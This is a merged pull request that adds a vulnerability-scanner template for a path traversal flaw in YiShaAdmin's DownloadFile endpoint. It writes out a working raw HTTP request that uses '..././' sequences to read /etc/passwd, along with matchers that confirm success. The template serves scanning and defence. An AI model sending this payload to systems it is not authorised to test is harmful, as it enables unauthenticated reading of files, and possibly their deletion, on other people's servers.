Merge pull request #3708 from evanRubinsteinIT/master

Added critical yshaadmin path traveral vulnerability

vulnerabilities/other/yishaadmin-lfi.yaml

@@ -0,0 +1,27 @@
+id: yishaadmin-lfi
+
+info:
+  name: yishaadmin path traversal
+  author: Evan Rubinstein
+  severity: high
+  description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication.
+  reference:
+    - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/
+    - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186
+  tags: lfi,yishaadmin
+
+requests:
+  - raw:
+      - |
+        GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200